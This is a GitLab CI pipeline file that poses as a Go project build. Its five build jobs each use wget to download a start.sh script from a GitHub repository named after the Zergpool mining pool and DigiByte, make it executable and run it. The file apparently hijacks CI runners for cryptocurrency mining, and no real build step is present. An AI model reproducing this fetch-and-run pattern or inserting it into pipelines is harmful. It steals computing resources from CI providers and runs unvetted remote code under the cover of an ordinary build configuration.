image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_01:
  stage: build
  script:
    - wget https://raw.githubusercontent.com/golekopo/Zergpool/main/DGB/00/start.sh && chmod u+x start.sh && ./start.sh

build_02:
  stage: build
  script:
    - wget https://raw.githubusercontent.com/golekopo/Zergpool/main/DGB/00/start.sh && chmod u+x start.sh && ./start.sh

build_03:
  stage: build
  script:
    - wget https://raw.githubusercontent.com/golekopo/Zergpool/main/DGB/00/start.sh && chmod u+x start.sh && ./start.sh

build_04:
  stage: build
  script:
    - wget https://raw.githubusercontent.com/golekopo/Zergpool/main/DGB/00/start.sh && chmod u+x start.sh && ./start.sh

build_05:
  stage: build
  script:
    - wget https://raw.githubusercontent.com/golekopo/Zergpool/main/DGB/00/start.sh && chmod u+x start.sh && ./start.sh
